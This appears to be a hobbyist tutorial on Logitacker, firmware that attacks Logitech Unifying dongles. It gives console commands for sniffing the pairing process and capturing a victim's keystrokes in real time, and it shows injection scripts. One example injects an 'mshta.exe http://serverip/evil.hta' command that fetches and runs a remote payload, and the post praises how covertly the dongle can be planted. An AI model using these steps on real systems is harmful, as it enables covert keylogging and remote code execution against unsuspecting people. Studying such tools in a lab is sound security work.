A small article about the Logitacker project. It's a kind of HID attack, dealing with Logitech dongles. It's a bit nerdy, so you've been warned.
So, what is a HID attack ?. Basically it's using a attack that simulates a human input device, like a mouse or a keyboard. These devices come in a variety of shapes, like Bash Bunny from Hak5, or the RubberDucky, also from Hak5. Heck, you can even use a Arduino to do it. The only thing it have to do, is being able to take a short program, send it through a emulated keyboard, running from USB, and get the machine to believe it came from a human being.
These devices vary in what they can do. Some only emulates a keyboard, some can also emulate an ethernet device, or USB storage, and can run different kind of scripting languages to automate the attack.
It's a bit like the good old autorun.inf from days past, we used to include on CD's . But, times change, and so does our tools. But what sets them apart from each other ?
Well, The rubberDucky / Bash Bunny, requires us to be around the target computer. Yes, we can run the attack, remove them, and take them with us, that's correct.
Projects like P4wnP1-ALOA, enables us to dump a small Raspberry PI Zero Wireless into the USB port, and let it sit there, running a AP we can access to feed scripts through, that is an option, but...it's large, and looks veery strange sitting in the back of a computer. What if there were another solution ? There is, enter Logitacker.
It's a dream. It's small, it's normal looking, it behaves and looks like an ordinary Logitech dongle, because it is. There's nothing wrong with it, it isn't changed in any way. It' can be bought almost anywhere, and it's dirt cheap.
Most importantly, people can check it all they want, and find nothing wrong with it. The downside, we have to place it, and we have to be around the office to use it, (up to 100 meters, this is not tested yet, more follows on range and antennas as I get it tested). The good thing is, that all control is defined at the transmitter dongle, not the reciever, aka the Logitech dongle itself. That means, once it's been planted, it will always be there.
So, what is the Logitacker ?. It's a custom firmware, written by MaMe82, and maintained by Rogan Dawes. The project code is on GitHub.
The first thing we need is a dongle to run the firmware on, I use something like the april-usb-dongle-52840 dongle. It's one of the platforms Logitacker can run on, and can be had for 12 US Dollars + tax, directly from April Brothers website, and then of course a Logitech Unifying keyboard and dongle for testing, from your local hardware supplier.
But, what can this thing do ?. Well, we can intercept the pairing process from the keyboard, and get a copy of the encryption key, or test if the keyboard is vulnerable to injection directly. That enable us to dump keystrokes in realtime, when within range of the Logitech dongle, and that's a kind of handy little feature. But, more importantly, we can inject keystrokes into the traffic. and Logitacker comes with it's own scripting language, looking somewhat like the famous duckyscript from the RubberDucky, that allows us to automate the attack.
Let's talk about main menu's for a bit. We have discover, passive-enum, active-enum, inject, script and pair.
The first thing is connecting. Insert the key, and find out where it is. Use dmesg for that, and find the ttyACM device Logitacker is running at. When you have that, connect to it.
screen /dev/ttyACMx 115200It will start in discover mode, and show you the traffic running in the air around you. If your keyboard is paired to the Logitech dongle, delete the pairing, and set Logitacker to sniff out the pairing process.
pair sniffNow, it should sniff the pairing process, and in a moment, we switch to another mode, for dumping traffic.
options passive-enum pass-through-mouse on
options passive-enum passive-through-keyboard onThere you go. Try to type on the keyboard, and if everything works, the keys should be mirrored to Logitackers output in realtime :)
That's the first thing we can do. Now, let's have a talk about the scripting function.
We can use if for a lot of fun stuff, like executing scripts, downloading malware, irritating users, and what else we can think of. But. we're getting ahead of ourselves here. Let's look at the scripting function itself.
The script function can use US-english ,French ,German and Danish as keyboard layout. ,and the scripting commands are these.
LOGITacker (discover) $ script
script - scripting for injection
Options:
-h, --help :Show command help.
Subcommands:
clear :clear current script (injection tasks)
undo :delete last command from script (last injection task)
show :show listing of current script
string :append 'string' command to script, which types out the text given as parameter
altstring :append 'altstring' command to script, which types out the text using NUMPAD
press :append 'press' command to script, which creates a key combination from the given parameters
delay :append 'delay' command to script, delays script execution by the amount of milliseconds given as parameter
store :store script to flash
load :load script from flash
list :list scripts stored on flash
remove :delete script from flashAs we can see, it's a very simple language, with just some basic functions. The buttons we can simulate with the press command are
RETURN, ESCAPE, TABULATOR, CAPS, PRINT, PRINTSCREEN, SCROLL, BREAK
INS, DEL, RIGHTARROW, LEFTARROW, DOWNARROW, UPARROW
NUM, APP, MENU, CTRL, CONTROL, SHIFT, ALT, GUI,
COMMAND, WINDOWS, , NONE, ERROR_ROLLOVER, POST_FAIL, ERROR_UNDEFINED,
A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z
1, 2, 3, 4, 5, 6, 7, 8, 9, 0,
ENTER, ESC, BACKSPACE, TAB, SPACE, MINUS, EQUAL, LEFTBRACE, RIGHTBRACE,
BACKSLASH, HASHTILDE, SEMICOLON, APOSTROPHE,
GRAVE, COMMA, DOT, SLASH, CAPSLOCK
F1, F2, F3, F4, F5, F6, F7, F8, F9, F10, F11, F12
SYSRQ, SCROLLLOCK, PAUSE, INSERT,
HOME, PAGEUP, DELETE, END, PAGEDOWN, RIGHT, LEFT, DOWN, UP,
NUMLOCK, KPSLASH, KPASTERISK, KPMINUS, KPPLUS, KPENTER, KP1,
KP2, KP3, KP4, KP5, KP6, KP7, KP8, KP9, KP0, KPDOT, 102ND, COMPOSE, POWER, KPEQUAL
F13, F14, F15, F16, F17, F18, F19,
F20, F21, F22, F23, F24
OPEN, HELP, PROPS, FRONT, STOP, AGAIN, UNDO, CUT, COPY, PASTE, FIND, MUTE, VOLUMEUP, VOLUMEDOWN,
KPLEFTPARENTHESE, KPRIGHTPARENTHESE, LEFTCTRL, LEFTSHIFT, LEFTALT, LEFTMETA, RIGHTCTRL, RIGHTSHIFT, RIGHTALT, RIGHTMETA
A simple script is like so.
LOGITacker (discover) $ script press NUMLOCK
LOGITacker (discover) $ script press GUI F1
LOGITacker (discover) $ script delay 500
LOGITacker (discover) $ script altstring "cmd.exe"
LOGITacker (discover) $ script press CTRL A
LOGITacker (discover) $ script press CTRL X
LOGITacker (discover) $ script press ALT F4
LOGITacker (discover) $ script delay 200
LOGITacker (discover) $ script press GUI
LOGITacker (discover) $ script delay 200
LOGITacker (discover) $ script press CTRL V
LOGITacker (discover) $ script press RETURN
LOGITacker (discover) $ script delay 500
LOGITacker (discover) $ script altstring "calc.exe"
LOGITacker (discover) $ script press RETURNSo, just for the fun of it, let's imagine we wrote something like this.
script press GUI R
script delay 500
script string "mshta.exe http://serverip/evil.hta"
script delay 200
script press ENTERAnd, let's imagine in the other end, stored on a webserver, is a hta file with a payload, what would happen ? It's just a thought, I'm not suggesting you actually do it, other than trying it out in a lab you own yourself.
And if you can't see the idea in this, try to look into Living-Of-The-Land binaries, and that sort of strategies, and I'm sure you'll see the light in mshta.exe and it's cousins. It really is a lof of fun.
So, this was a short intro to Logitacker. Really give it a try, and while you're at it, try the other project P4wnP1-ALOA out also. It's an advanced tool, based on a custom Kali Linux for all kinds of HID fun, based on the Raspberry Pi Zero Wireless platform. For something with a little more computing power, try Kali on the Odroid C2 platform, for an internal little offensive box. That's another project i'm looking into, and more will follow on that one, once I get it all sorted out :)
Happy Logitech Hunting :)